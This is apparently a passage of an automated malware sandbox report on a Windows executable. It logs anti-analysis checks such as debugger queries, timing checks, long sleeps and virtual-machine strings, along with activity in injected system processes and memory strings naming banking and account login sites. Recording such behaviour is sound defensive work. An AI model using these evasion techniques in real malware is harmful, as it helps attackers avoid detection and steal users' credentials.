Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_045651DF push ds; ret 11_2_045651E3
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04560C1A push ds; ret 11_2_04560C1C
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04566DB9 push cs; iretd 11_2_04566DC0
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Z6s208B9QX.exe | API/Special instruction interceptor: Address: 454F27C
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D324
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D7E4
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D944
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D504
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D544
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52D1E4
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE530154
Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFEFE52DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0377096E rdtsc 8_2_0377096E
Source: C:\Windows\SysWOW64\write.exe | Window / User API: threadDelayed 9745
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87595
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\write.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\write.exe TID: 5228 | Thread sleep count: 228 > 30
Source: C:\Windows\SysWOW64\write.exe TID: 5228 | Thread sleep time: -456000s >= -30000s
Source: C:\Windows\SysWOW64\write.exe TID: 5228 | Thread sleep count: 9745 > 30
Source: C:\Windows\SysWOW64\write.exe TID: 5228 | Thread sleep time: -19490000s >= -30000s
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556 | Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556 | Thread sleep time: -48000s >= -30000s
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556 | Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\write.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\write.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0054C340 FindFirstFileW,FindNextFileW,FindClose, 11_2_0054C340
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: 7251G3-6.11.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: tasks.office.comVMware20,11696503903o
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: 7251G3-6.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: 7251G3-6.11.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: 7251G3-6.11.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: 7251G3-6.11.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: 7251G3-6.11.dr | Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: 7251G3-6.11.dr | Binary or memory string: global block list test formVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: 7251G3-6.11.dr | Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: 7251G3-6.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: AMC password management pageVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: UCAmCgWJyh.exe, 0000000D.00000002.3744553832.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 7251G3-6.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: firefox.exe, 00000011.00000002.2024960803.000001813FE6C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 7251G3-6.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: 7251G3-6.11.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: 7251G3-6.11.dr | Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: 7251G3-6.11.dr | Binary or memory string: outlook.office.comVMware20,11696503903s
Source: 7251G3-6.11.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: 7251G3-6.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: 7251G3-6.11.dr | Binary or memory string: dev.azure.comVMware20,11696503903j
Source: 7251G3-6.11.dr | Binary or memory string: discord.comVMware20,11696503903f
Source: 7251G3-6.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | API call chain: ExitProcess graph end node graph_0-86725
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\write.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0377096E rdtsc 8_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00417593 LdrLoadDll, 8_2_00417593
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0454F4E8 mov eax, dword ptr fs:[00000030h] 0_2_0454F4E8
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0454F548 mov eax, dword ptr fs:[00000030h] 0_2_0454F548
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0454DE88 mov eax, dword ptr fs:[00000030h] 0_2_0454DE88
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037D437C mov eax, dword ptr fs:[00000030h] 8_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov eax, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov eax, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov eax, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov ecx, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov eax, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B035C mov eax, dword ptr fs:[00000030h] 8_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037FA352 mov eax, dword ptr fs:[00000030h] 8_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037D8350 mov ecx, dword ptr fs:[00000030h] 8_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037B2349 mov eax, dword ptr fs:[00000030h] 8_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0372C310 mov ecx, dword ptr fs:[00000030h] 8_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03750310 mov ecx, dword ptr fs:[00000030h] 8_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h] 8_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h] 8_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0376A30B mov eax, dword ptr fs:[00000030h] 8_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037663FF mov eax, dword ptr fs:[00000030h] 8_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h] 8_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h] 8_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h] 8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037403E9 mov eax, dword ptr fs:[00000030h]8_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov ecx, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE3DB mov eax, dword ptr fs:[00000030h]8_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D43D4 mov eax, dword ptr fs:[00000030h]8_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D43D4 mov eax, dword ptr fs:[00000030h]8_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EC3CD mov eax, dword ptr fs:[00000030h]8_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A3C0 mov eax, dword ptr fs:[00000030h]8_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037383C0 mov eax, dword ptr fs:[00000030h]8_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B63C0 mov eax, dword ptr fs:[00000030h]8_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728397 mov eax, dword ptr fs:[00000030h]8_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E388 mov eax, dword ptr fs:[00000030h]8_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375438F mov eax, dword ptr fs:[00000030h]8_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375438F mov eax, dword ptr fs:[00000030h]8_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0274 mov eax, dword ptr fs:[00000030h]8_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734260 mov eax, dword ptr fs:[00000030h]8_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372826B mov eax, dword ptr fs:[00000030h]8_2_0372826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372A250 mov eax, dword ptr fs:[00000030h]8_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736259 mov eax, dword ptr fs:[00000030h]8_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B8243 mov eax, dword ptr fs:[00000030h]8_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B8243 mov ecx, dword ptr fs:[00000030h]8_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372823B mov eax, dword ptr fs:[00000030h]8_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402E1 mov eax, dword ptr fs:[00000030h]8_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A2C3 mov eax, dword ptr fs:[00000030h]8_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402A0 mov eax, dword ptr fs:[00000030h]8_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037402A0 mov eax, dword ptr fs:[00000030h]8_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov ecx, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C62A0 mov eax, dword ptr fs:[00000030h]8_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E284 mov eax, dword ptr fs:[00000030h]8_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E284 mov eax, dword ptr fs:[00000030h]8_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0283 mov eax, dword ptr fs:[00000030h]8_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C156 mov eax, dword ptr fs:[00000030h]8_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C8158 mov eax, dword ptr fs:[00000030h]8_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736154 mov eax, dword ptr fs:[00000030h]8_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736154 mov eax, dword ptr fs:[00000030h]8_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov ecx, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C4144 mov eax, dword ptr fs:[00000030h]8_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760124 mov eax, dword ptr fs:[00000030h]8_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov ecx, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA118 mov eax, dword ptr fs:[00000030h]8_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038061E5 mov eax, dword ptr fs:[00000030h]8_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F0115 mov eax, dword ptr fs:[00000030h]8_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov ecx, dword ptr fs:[00000030h]8_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DE10E mov eax, dword ptr fs:[00000030h]8_2_037DE10E
